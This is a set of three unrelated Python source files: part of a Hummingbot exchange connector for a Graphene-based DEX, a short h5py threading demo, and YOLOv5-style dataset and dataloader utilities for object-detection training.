self.dev_log("###################TIME###########################")
await self._update_balances()
self.dev_log("###################BALANCES:######################")
self.dev_log(self._account_balances)
self._last_poll_timestamp = self.current_timestamp
self.dev_log("###################TIMESTAMP######################")
await asyncio.sleep(1)
self.dev_log("###################END#LOOP#######################")
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().network(
"Unexpected error while fetching updates.",
exc_info=True,
app_warning_msg=(
"Could not fetch account updates. "
"Check metanode and network connection."
),
)
finally:
self._poll_notifier = asyncio.Event()
async def _trading_rules_polling_loop(self):
"""
Performs all required operations to keep the connector synchronized
with the DEX. It also updates the time synchronizer.
Executes when the _poll_notifier event is enabled by the `tick` function.
"""
# self.dev_log("_trading_rules_polling_loop")
while True:
try:
await asyncio.sleep(1)
await self._update_trading_rules()
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().network(
"Unexpected error while fetching updates.",
exc_info=True,
app_warning_msg=(
"Could not fetch account updates. "
"Check metanode and network connection."
),
)
async def _update_trading_rules(self):
"""
gather DEX info from metanode.assets and pass on to _trading_rules
"""
# self.dev_log("_update_trading_rules")
try:
graphene_max = self.constants.core.GRAPHENE_MAX
metanode_assets = self.metanode.assets
rules = []
for trading_pair in self.constants.chain.PAIRS:
base, quote = trading_pair.split("-")
base_min = self.constants.core.DECIMAL_SATOSHI
quote_min = self.constants.core.DECIMAL_SATOSHI
supply = self.constants.core.DECIMAL_SATOSHI
try:
base_min = Decimal(2) / 10 ** metanode_assets[base]["precision"]
quote_min = Decimal(2) / 10 ** metanode_assets[quote]["precision"]
supply = Decimal(metanode_assets[base]["supply"])
except Exception:
pass
rules.append(
TradingRule(
trading_pair=trading_pair,
min_order_size=base_min,
max_order_size=supply,
min_price_increment=Decimal(1) / int(graphene_max),
min_base_amount_increment=base_min,
min_quote_amount_increment=quote_min,
min_notional_size=base_min,
min_order_value=quote_min,
max_price_significant_digits=Decimal(graphene_max),
supports_limit_orders=True,
supports_market_orders=False, # OrderType.LIMIT *only*
buy_order_collateral_token=None,
sell_order_collateral_token=None,
)
)
self._trading_rules.clear()
for trading_rule in rules:
self._trading_rules[trading_rule.trading_pair] = trading_rule
except Exception as error:
msg = f"Error updating trading rules: {error.args}"
self.logger().exception(msg)
async def _user_stream_event_listener(self):
"""
This functions runs in background continuously processing the events
received from the DEX by the user stream data source.
It keeps reading events from the queue until the task is interrupted.
The events received are order updates and trade events.
"""
# self.dev_log("_user_stream_event_listener")
async def iter_user_event_queue() -> AsyncIterable[Dict[str, any]]:
"""
fetch events from the user stream
"""
while True:
try:
user_streamer = await self._user_stream_tracker.user_stream.get()
self.dev_log("########################")
self.dev_log(user_streamer)
self.dev_log("########################")
yield user_streamer
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().network(
"Unknown error. Retrying after 1 seconds.",
exc_info=True,
app_warning_msg=(
"Could not fetch user events from Graphene."
"Check network connection."
),
)
await asyncio.sleep(1.0)
finally:
await asyncio.sleep(0.1)
async for event_message in iter_user_event_queue():
try:
# localize and type cast values common to all event_messages
trading_pair = str(event_message["trading_pair"])
execution_type = str(event_message["execution_type"])
client_order_id = str(event_message["client_order_id"])
exchange_order_id = str(event_message["exchange_order_id"])
# process trade event messages
if execution_type == "FILL":
tracked_order = self._order_tracker.fetch_order(
client_order_id=client_order_id
)
if tracked_order is not None:
# localize and type cast fill order event message values
trade_id = str(event_message["trade_id"])
fee_asset = str(event_message["fee_asset"])
fee_paid = Decimal(event_message["fee_paid"])
fill_price = Decimal(event_message["price"])
fill_timestamp = int(event_message["fill_timestamp"])
fill_base_amount = Decimal(event_message["fill_base_amount"])
# estimate the quote amount
fill_quote_amount = fill_base_amount * fill_price
# process a trade update
trade_update = TradeUpdate(
client_order_id=client_order_id,
exchange_order_id=exchange_order_id,
trading_pair=trading_pair,
fill_base_amount=fill_base_amount,
fill_quote_amount=fill_quote_amount,
fill_price=fill_price,
trade_id=trade_id,
fee_asset=fee_asset,
fee_paid=fee_paid,
fill_timestamp=fill_timestamp,
)
self._order_tracker.process_trade_update(trade_update)
# all other event messages just change order state
# eg "CANCELLED" or "FILLED"
in_flight_order = self.in_flight_orders.get(client_order_id)
if in_flight_order is not None:
# localize order state event message values
update_timestamp = (int(event_message["update_timestamp"]),)
new_state = (
self.constants.ORDER_STATE[event_message["order_state"]],
)
# process an order update
order_update = OrderUpdate(
trading_pair=trading_pair,
client_order_id=client_order_id,
exchange_order_id=exchange_order_id,
update_timestamp=update_timestamp,
new_state=new_state,
)
self._order_tracker.process_order_update(order_update=order_update)
await self._update_balances()
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
self.logger().error(
"Unexpected error in user stream listener loop.", exc_info=True
)
await asyncio.sleep(1.0)
async def _update_balances(self):
"""
use metanode.assets 'total' and 'free' to update
self._account_balances
self._account_available_balances
"""
# self.dev_log("Updating Balances")
if self._account_balances == {}:
self._auth.login()
try:
if await self.check_network() == NetworkStatus.NOT_CONNECTED:
for asset in self.constants.chain.ASSETS:
self._account_available_balances[asset] = Decimal(0)
self._account_balances[asset] = Decimal(0)
else:
metanode_assets = self.metanode.assets
for asset in self.constants.chain.ASSETS:
self._account_available_balances[asset] = Decimal(
str(metanode_assets[asset]["balance"]["free"])
)
self._account_balances[asset] = Decimal(
str(metanode_assets[asset]["balance"]["total"])
)
except Exception as error:
for asset in self.constants.chain.ASSETS:
self._account_available_balances[asset] = Decimal(0)
self._account_balances[asset] = Decimal(0)
msg = f"Error updating account balances: {error.args}"
self.logger().exception(msg)
msgs = [
"Available Balances",
self._account_available_balances,
"Total Balances",
self._account_balances,
]
for msg in msgs:
self.dev_log(msg)
async def _update_time_synchronizer(self):
"""
Used to synchronize the local time with the server's time.
This class is useful when timestamp-based signatures
are required by the DEX for authentication.
Upon receiving a timestamped message from the server,
use `update_server_time_offset_with_time_provider`
to synchronize local time with the server's time.
"""
# self.dev_log("_update_time_synchronizer")
if self.constants.hummingbot.SYNCHRONIZE:
synchro = self._time_synchronizer
try:
await synchro.update_server_time_offset_with_time_provider(
time_provider=self.metanode.timing["blocktime"]
)
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
except Exception:
self.logger().exception("Error requesting server time")
raise
|
garbage.py | # This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
Demonstrates garbage messages printed to stderr for membership
testing, when performed in new threads.
"""
from threading import Thread
import h5py
def demonstrate():
with h5py.File('foo', 'w', driver='core') as f:
print('x' in f)
if __name__ == '__main__':
print("Main thread")
demonstrate()
thread = Thread(target=demonstrate)
print("New thread")
thread.start()
thread.join()
|
yolo_datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils import xyxy2xywh, xywh2xyxy, clean_str
# from yolov5.utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff',
'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv',
'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def get_yolo_dataset():
# Make sure only the first process in DDP process the dataset first, and the
# following others can use the cache
path = '/home/qiyuan/2021summer/imageclef/train.txt'
imgsz = 640
batch_size = 1
augment = False
stride = 32
pad = 0.5
rect = True
rank = -1
cache = False
hyp = None
image_weights = False
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp,
# augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=False,
stride=int(stride),
pad=pad,
rank=rank,
image_weights=image_weights)
return dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler',
_RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (
self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640):
self.img_size = img_size
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'stream'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if
len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in
sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack(
[letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs],
0) # inference shapes
self.rect = np.unique(s, axis=0).shape[
0] == 1 # rect inference if all shapes equal
if not self.rect:
print(
'WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in
img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1,
2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x
in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False,
hyp=None, rect=False, image_weights=False, cache_images=False,
single_cls=False, stride=32, pad=0.0, rank=-1):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [
x.replace('./', parent) if x.startswith('./') else x
for x in t] # local to global path
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted([x.replace('/', os.sep) for x in f if
x.split('.')[-1].lower() in img_formats])
assert self.img_files, 'No images found'
except Exception as e:
raise Exception(
'Error loading data from %s: %s\nSee %s' % (path, e, help_url))
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = Path(self.label_files[0]).parent.with_suffix(
'.cache') # cached labels
if cache_path.is_file():
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(
self.label_files + self.img_files) or 'results' not in cache: # changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Display cache
[nf, nm, ne, nc, n] = cache.pop(
'results') # found, missing, empty, corrupted, total
desc = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=desc, total=n, initial=n)
assert nf > 0 or not augment, f'No labels found in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
labels, shapes = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(
np.array(shapes) * img_size / stride + pad).astype(
np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(4).imap(lambda x: load_image(*x),
zip(repeat(self),
range(n))) # 4 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[
i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path=Path('./labels.cache')):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files),
desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = np.array(
[x.split() for x in f.read().strip().splitlines()],
dtype=np.float32) # labels
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:,
1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[
0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape]
except Exception as e:
nc += 1
print(
'WARNING: Ignoring corrupted image and/or label %s: %s' % (
im_file, e))
pbar.desc = f"Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = [nf, nm, ne, nc, i + 1]
torch.save(x, path) # save for next time
logging.info(f"New cache created: {path}")
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[
index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False,
scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[
0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[
1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'],
vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
def getitem(self, iid):
img, (h0, w0), (h, w) = load_image(self, iid)
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[
index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False,
scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
# labels = []
# x = self.labels[index]
# if x.size > 0:
# # Normalized xywh to pixel xyxy format
# labels = x.copy()
# labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[
# 0] # pad width
# labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[
# 1] # pad height
# labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
# labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
# if self.augment:
# # Augment imagespace
# if not mosaic:
# img, labels = random_perspective(img, labels,
# degrees=hyp['degrees'],
# translate=hyp['translate'],
# scale=hyp['scale'],
# shear=hyp['shear'],
# perspective=hyp['perspective'])
#
# # Augment colorspace
# augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'],
# vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
# nL = len(labels) # number of labels
# if nL:
# labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
# labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
# labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
# if self.augment:
# # flip up-down
# if random.random() < hyp['flipud']:
# img = np.flipud(img)
# if nL:
# labels[:, 2] = 1 - labels[:, 2]
#
# # flip left-right
# if random.random() < hyp['fliplr']:
# img = np.fliplr(img)
# if nL:
# labels[:, 1] = 1 - labels[:, 1]
#
# labels_out = torch.zeros((nL, 6))
# if nL:
# labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img) # labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)),
interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[
index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat),
cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in
self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in
range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114,
dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h,
0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (
y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b,
x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s,
out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(
random.uniform(0, w - bw)) # offset x, y
